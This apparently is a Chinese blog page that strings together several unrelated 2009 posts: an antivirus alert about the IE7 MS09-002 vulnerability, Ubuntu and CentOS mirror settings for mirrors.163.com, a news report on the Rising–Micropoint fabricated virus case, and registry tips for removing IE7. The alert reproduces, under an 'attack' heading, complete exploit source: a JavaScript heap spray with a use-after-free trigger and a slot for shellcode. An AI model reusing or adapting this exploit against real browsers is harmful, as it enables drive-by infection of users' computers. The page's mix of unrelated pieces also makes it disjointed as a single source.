江民反病毒中心监测到,利用微软MS09-002漏洞的完整攻击代码被公布在互联网上,据了解,该漏洞存在于微软IE7浏览器中,如果用户没有及时修补该漏洞,当用户使用存在漏洞的IE7浏览器浏览网页时,一旦打开了被黑客恶意挂马的网页时,病毒就会利用该漏洞入侵到用户计算机中,给用户带来严重的损失。
据江民反病毒专家介绍,目前微软MS09-002漏洞还没有被大量用于网页挂马,但随着攻击代码被完全公布在互联网上,预计在未来的几天内就会被国内的黑客大面积利用,用于广泛的传播各种恶意软件。
江民反病毒专家提醒广大用户,微软公司已经于北京时间2月11日发布了针对此漏洞的安全更新程序,用户上网时务必及时修补微软MS09-002漏洞,以免受到病毒的侵害。与此同时,用户可以使用江民杀毒软件KV2009的漏洞检测工具,自动修补该漏洞。
[防]:
MS09-002漏洞补丁下载页面:
http://www.microsoft.com/china/technet/security/bulletin/MS09-002.mspx
[攻]:
Expolit源代码:
<!--
MS09-002
===============================
grabbed from:
wget http://www.chengjitj.com/bbs/images/alipay/mm/jc/jc.html --user-agent="MSIE 7.0; Windows NT 5.1"
took a little but found it. /str0ke
-->
<script language="JavaScript">
var c="putyourshizhere-unescaped";
var array = new Array();
var ls = 0x100000-(c.length*2+0x01020);
var b = unescape("%u0C0C%u0C0C");
while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;
for(i=0; i<0xC0; i++) {
array[i] = lh + c;
}
CollectGarbage();
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));
function ok() {
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>
# milw0rm.com [2009-02-18]
网易悄悄上线了一个开源镜象网站,域名是 http://mirrors.163.com/。目前提供了 Debian、Ubuntu、Fedora、Gentoo、Centos、FreeBSD等流行开源操作系统以及Eclipse等开源软件的镜象。经过实测,上海2M ADSL访问速度能达到100K以上。这是几大门户中第一个提供开源软件镜象服务的网站。感谢网易为推动开源的发展做出的贡献:
ubuntu8.10的163源为:
deb http://mirrors.163.com/ubuntu/ intrepid main restricted universe multiverse
deb http://mirrors.163.com/ubuntu/ intrepid-security main restricted universe multiverse
deb http://mirrors.163.com/ubuntu/ intrepid-updates main restricted universe multiverse
deb http://mirrors.163.com/ubuntu/ intrepid-proposed main restricted universe multiverse
deb http://mirrors.163.com/ubuntu/ intrepid-backports main restricted universe multiverse
deb-src http://mirrors.163.com/ubuntu/ intrepid main restricted universe multiverse
deb-src http://mirrors.163.com/ubuntu/ intrepid-security main restricted universe multiverse
deb-src http://mirrors.163.com/ubuntu/ intrepid-updates main restricted universe multiverse
deb-src http://mirrors.163.com/ubuntu/ intrepid-proposed main restricted universe multiverse
deb-src http://mirrors.163.com/ubuntu/ intrepid-backports main restricted universe multiverse
ubuntu 8.04的163源为:
deb http://mirrors.163.com/ubuntu/ hardy main restricted universe multiverse
deb http://mirrors.163.com/ubuntu/ hardy-security main restricted universe multiverse
deb http://mirrors.163.com/ubuntu/ hardy-updates main restricted universe multiverse
deb http://mirrors.163.com/ubuntu/ hardy-proposed main restricted universe multiverse
deb http://mirrors.163.com/ubuntu/ hardy-backports main restricted universe multiverse
deb-src http://mirrors.163.com/ubuntu/ hardy main restricted universe multiverse
deb-src http://mirrors.163.com/ubuntu/ hardy-security main restricted universe multiverse
deb-src http://mirrors.163.com/ubuntu/ hardy-updates main restricted universe multiverse
deb-src http://mirrors.163.com/ubuntu/ hardy-proposed main restricted universe multiverse
deb-src http://mirrors.163.com/ubuntu/ hardy-backports main restricted universe multiverse
由于我的yum升级速度一直不太理想,今天发现163提供了centos的开源镜像,在此首先感谢163对国内开源事业的贡献。
先备份一下系统默认的源配置文件:
[root@CentOS ~]#cd /etc/yum.repos.d/
[root@CentOS ~]#cp -a CentOS-Base.repo CentOS-Base.repo.bak
[root@CentOS ~]#vim CentOS-Base.repo
CentOS-Base.repo内容如下:
# CentOS-Base.repo
#
# This file uses a new mirrorlist system developed by Lance Davis for CentOS.
# The mirror system uses the connecting IP address of the client and the
# update status of each mirror to pick mirrors that are updated to and
# geographically close to the client. You should use this for CentOS updates
# unless you are manually picking other mirrors.
#
# If the mirrorlist= does not work for you, as a fall back you can try the
# remarked out baseurl= line instead.
#
#
[base]
name=CentOS-$releasever - Base
#mirrorlist=http://mirrorlist.centos.org/?release=$releasever&arch=$basearch&repo=os
#baseurl=http://mirror.centos.org/centos/$releasever/os/$basearch/
baseurl=http://mirrors.163.com/centos/$releasever/os/$basearch/
gpgcheck=1
gpgkey=http://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-5
#released updates
[updates]
name=CentOS-$releasever - Updates
#mirrorlist=http://mirrorlist.centos.org/?release=$releasever&arch=$basearch&repo=updates
#baseurl=http://mirror.centos.org/centos/$releasever/updates/$basearch/
baseurl=http://mirrors.163.com/centos/$releasever/updates/$basearch/
gpgcheck=1
gpgkey=http://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-5
#packages used/produced in the build but not released
[addons]
name=CentOS-$releasever - Addons
#mirrorlist=http://mirrorlist.centos.org/?release=$releasever&arch=$basearch&repo=addons
#baseurl=http://mirror.centos.org/centos/$releasever/addons/$basearch/
baseurl=http://mirrors.163.com/centos/$releasever/addons/$basearch/
gpgcheck=1
gpgkey=http://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-5
#additional packages that may be useful
[extras]
name=CentOS-$releasever - Extras
#mirrorlist=http://mirrorlist.centos.org/?release=$releasever&arch=$basearch&repo=extras
#baseurl=http://mirror.centos.org/centos/$releasever/extras/$basearch/
baseurl=http://mirrors.163.com/centos/$releasever/extras/$basearch/
gpgcheck=1
gpgkey=http://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-5
#additional packages that extend functionality of existing packages
[centosplus]
name=CentOS-$releasever - Plus
#mirrorlist=http://mirrorlist.centos.org/?release=$releasever&arch=$basearch&repo=centosplus
#baseurl=http://mirror.centos.org/centos/$releasever/centosplus/$basearch/
baseurl=http://mirrors.163.com/centos/$releasever/centosplus/$basearch/
gpgcheck=1
enabled=0
gpgkey=http://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-5
北京晚报2月19日报道 3年前,北京警方破获“全国首例故意传播网络病毒案件”,称微点公司“在软件研制过程中,违规在互联网上下载、运行多种病毒”,“致使计算机病毒在互联网上大量传播,严重危害网络安全,造成重大经济损失”。该新闻轰动一时。微点公司副总后来被警方关押11个月。
3年前,北京警方破获“全国首例故意传播网络病毒案件”,称微点公司“在软件研制过程中,违规在互联网上下载、运行多种病毒”,“致使计算机病毒在互联网上大量传播,严重危害网络安全,造成重大经济损失”。该新闻轰动一时。微点公司副总后来被警方关押11个月。 日前,北京查获一起造假陷害高科技企业案。真相终于大白于天下,杀毒软件巨头瑞星公司当时为了扼杀微点这个新生的杀毒公司,请托北京市公安局网监处处长于兵通过假报案、假损失、假鉴定的手法陷害竞争对手。
于兵已被北京市纪委立案调查,瑞星副总裁赵四章已被批捕。
17日《科技日报》刊发了题为“一项重大原始创新何以大难不死——北京东方微点公司起死回生始末”的特稿,对此案进行了详细报道。《北京晚报》记者采访了相关各方,力图还原这桩堪称中国计算机杀毒业界最大的丑闻。
要“铲”竞争对手
3年前,一条题为“北京破获全国首例故意传播网络病毒案件”的消息,在北京和地方各大媒体刊出,震惊全国。消息称,“北京东方微点信息技术有限责任公司(以下简称微点公司)在世界首创主动防御病毒软件,打破了对于计算机病毒全世界只能被动防御的局面。然而,该公司在软件研制过程中,违规在互联网上下载、运行多种病毒”,“致使计算机病毒在互联网上大量传播,严重危害网络安全,造成重大经济损失 ”。
消息引起了计算机用户极大的愤慨,众多网民对此予以谴责。案件当事人之一、微点公司副总经理田亚葵也因“网络传播病毒案”被警方逮捕关押11个月。微点公司背上了“防病毒公司传毒”的罪名。
然而,谁也不会想到,这样一个震惊全国的“国内首例防病毒公司传播病毒案”,竟是个别执法人员与商业公司联手制造的一起假案。让微点公司横遭不测的正是前文提到的“主动防御病毒软件”。
网监处长受请托
刘旭,瑞星杀毒软件的原设计者和发明人,在辞去北京瑞星科技股份有限公司董事总经理兼总工程师两年后,于2005年1月创办了北京东方微点信息技术有限责任公司。“主动防御病毒软件”是该公司计划冲击杀毒市场的新产品。
2005年的中国IT安全市场已经呈现出瑞星一家独大的局面。
据《科技日报》报道,原北京市公安局公共信息网络安全监察处处长于兵,就是在2005年7月初接受了北京瑞星科技股份有限公司的请托,指令他人“铲”了从事计算机病毒防范软件研发业务的东方微点公司。
要阻止微点软件的上市,最有效的就是阻止其取得销售许可证。
由于我国对病毒防治产品实施销售许可证制度,而要取得销售许可证必须具备企业经营执照、产品备案、公安部指定机构的产品检测报告三个基本条件,其中,检测机构的检测报告对获得许可证尤为关键。正当微点公司向网监处递交研发备案报告,同时向公安部指定的国家计算机病毒防治产品检测中心申请产品检测并为产品上市做各项准备之际,“几个民警来到公司,进行‘反病毒公司资质调查’”。
微点公司总经理刘旭称:“2005年7月5日,他们莫名其妙地对公司进行了一个多月的检查,频繁传唤包括我在内的公司管理和研发人员,直至2005年8月30日凌晨,网监处依照《刑法》第二百八十六条第三款的规定,将涉嫌所谓‘故意制作、传播计算机病毒等破坏程序影响计算机系统正常运行造成严重后果’的公司副总经理田亚葵刑事拘留。”
9月6日,国家计算机病毒防治产品检测中心收到公函,以微点公司涉案为由,要求其对微点产品不予检测,封杀了微点公司防病毒产品的上市权利。同年10月21日,“破获国内首例防病毒公司传播病毒案”的新闻发布。
假报案、假损失、假鉴定
据《科技日报》报道,2005年8月,于兵部署他人到北京思麦特管理顾问有限公司和北京健桥证券股份有限公司北京管理部,调查了解公司电脑被病毒感染及造成损失的情况。于兵在听取汇报上述两家公司有病毒感染但未造成损失的情况下,仍授意让思麦特公司和健桥公司,分别出具了10万元虚假损失证据材料。
2005年8月27日,为证实从思麦特公司和健桥公司查到的木马病毒——蠕虫病毒,是从东方微点公司副总经理田亚葵笔记本电脑中传播出来的,于兵授意他人召集病毒专家论证会。在论证过程中,没有给专家如实提供材料。专家论证后,在于兵授意下,专家意见又被从“基本可以确定”改为“可以确定”。
2005年9月,即微点公司副总经理田亚葵被刑事拘留后,由于缺少报案材料,于兵指使他人到北京另外三家杀毒软件公司做工作,让三家公司分别出具虚假“病毒爆发”报案材料。同时,于兵指使委托由瑞星公司副总裁赵四章推荐的瑞星公司监事为合伙人的中润华会计师事务所,对东方微点副总田亚葵传播病毒案件涉及的有关损失进行评估,并将该会计师事务所的违规评估结论作为认定田亚葵构成“破坏计算机信息系统罪”和“侵犯商业秘密罪”的主要证据。
于兵等人认定,田亚葵所用的与互联网连接的笔记本电脑中,有四种病毒于2004年12月21日被激活,导致对外传播,造成较大损失。而经查,田亚葵笔记本电脑上网的ADSL电话线是2005年4月1日才开通使用。而且,经国家信息中心电子数据司法鉴定中心重新鉴定,在田亚葵笔记本电脑中的四种病毒只发现了三种,而且从未被激活过。
据《科技日报》报道,北京市纪检机关经立案调查,查明“北京东方微点传播计算机病毒案件”是调取假报案、假损失、假鉴定等证据材料制造的一起假案。
网监处长被立案调查
2007年5月,刘旭向最高人民检察院、公安部等国家有关部门举报,得到了高度重视。 2007年11月20日,田亚葵在被羁押11个月和取保候审12个月后,北京市海淀区检察院对田亚葵作出了不起诉的决定。微点主动防御软件在因所谓“国内首例防病毒公司传播病毒案”被封杀两年半后,获准向国家计算机病毒防治产品检测中心办理产品上市销售前的检测手续。2008年2月,微点主动防御软件终于获得被阻挠了近三年的销售许可证。
据《科技日报》报道,2008年7月,北京市纪委接到实名举报,反映于兵等人存在徇私枉法等问题。市纪委高度重视,成立专案组对于兵等人的严重违法违纪问题进行立案调查。现已查明,于兵涉嫌收受瑞星公司贿赂、利用职务便利贪污公款,涉案金额巨大。另据透露,瑞星公司副总裁赵四章已被批捕。
2009年2月7日,微点公司总经理刘旭向记者表示,“正在准备向瑞星公司索赔”。根据微点公司提供的数字,主动防御软件上市受阻近三年,使微点公司蒙受直接经济损失三千多万元。
今天在虚拟机上装了个Ghost版的Windows XP(SP3),没想到这Ghost的Windows XP太变态了。
系统恢复完以后,IE默认的是IE7,以前遇到过IE7,用不习惯,准备去“添加/删除程序”里面将IE7卸载的,勾选了“显示更新”,依然没有IE7的影子。
在网上找了数百个网页,终于找到了方法,依然是用的Microsoft公司的卸载工具,不过用这个工具之前要对Windows XP的注册表添加一点东东里面:
1、运行regedit,打开Windows注册表编辑器。
2、依然找到:HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer位置,选中InternetExplorer,在右边空白处右键点击,选择“新建”-->“DWORD值”把“新值 #1”改为“InstalledByUser”,确认修改后,双击这一行,把“InstalledByUser”的值改为“1”(没有引号!);
3、然后到Microsoft官方下载Internet Explorer 7 Beta 2 Uninstall Toolkit工具,
下载完成以后,执行程序,按程序默认执行就可以把IE7删除,重启后恢复原来使用的IE6。
恢复IE6以后,发现桌面上的Internet Explorer的右键没有“打开主页”这一项,双击Internet Explorer却是创建快捷方式。
将以下红色字体内容保存为.reg文件,双击导入注册表即可:
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage]
"LegacyDisable"=-
注意:
1、以上红色字体部分,每一行中间有一空白行;
2、以上方法在Windows XP Profession(SP3)下测试成功, Windows Server 2003 Enterprise Edition操作系统下测试失败。
请勿将此方法用于Windows Server 2003 * 操作系统下IE7的卸载。
用户都升级到了IE7,结果发现浏览网页已经没办法顺利进行了,表现现象为:曾经打开过的WORD文档再次打开出现乱码;CAD文件在Visview中打 开到一半时会自动关闭Visview,以致无法浏览到文件;在IE6的机器上可以正常浏览。所以,决定卸载IE7,改用IE6,使用百度从网上查到在方法 如下:
方法1:
1、点击开始->控制面板->添加删除程序。
2、点击上方的“显示更新”选项,这样就能在下面的列表中看到IE7的选项了,点击“卸载”。
3、卸载了IE7之后重启系统,然后就可以回到IE6了。
方法2:利用windows XP中的IE6.0修复方法
1、在“运行”输入“regedit”回车,打开注册表。
2、 在注册表中找到HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\ActiveSetup \\InstalledComponents\\{89820200-ECBD-11cf-8B85-00AA005B4383},在其右窗口中,将 IsInstalled值由“1”改为“0”。
3、在“控制面板”里的“添加或删除程序”中选中“显示更新”,然后卸载IE7。
4、重启,系统将自动删除IE,并自动重装IE。
方法3:
1、在注册表HKEY_CURRENT_USER\software\Microsoft\internet explorer新建一个字符串值,名字为InstalledByUser,然后命名为你登录系统的名字;
2、不用重启,在运行中重新输入卸载命令:%windir%\ie7\spuninst\spuninst.exe,就出现了的ie7卸载界面,重启即可见到ie6。
以下网址提供卸载工具下载: http://down1.tech.sina.com.cn/download/down_page/1158422400/29904.shtml
操作系统环境:Windows XP(32 Bit) Service Pack 2 IE
版本:7.0.5346.5
恢复IE6
1、 在注册表中找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ActiveSetup \InstalledComponents\{89820200-ECBD-11cf-8B85-00AA005B4383},在其右窗口中,将 IsInstalled值由“1”改为“0”。
2、放入WINDOWS XP安装光盘,在运行键入:rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 %windir%\Inf\ie.inf
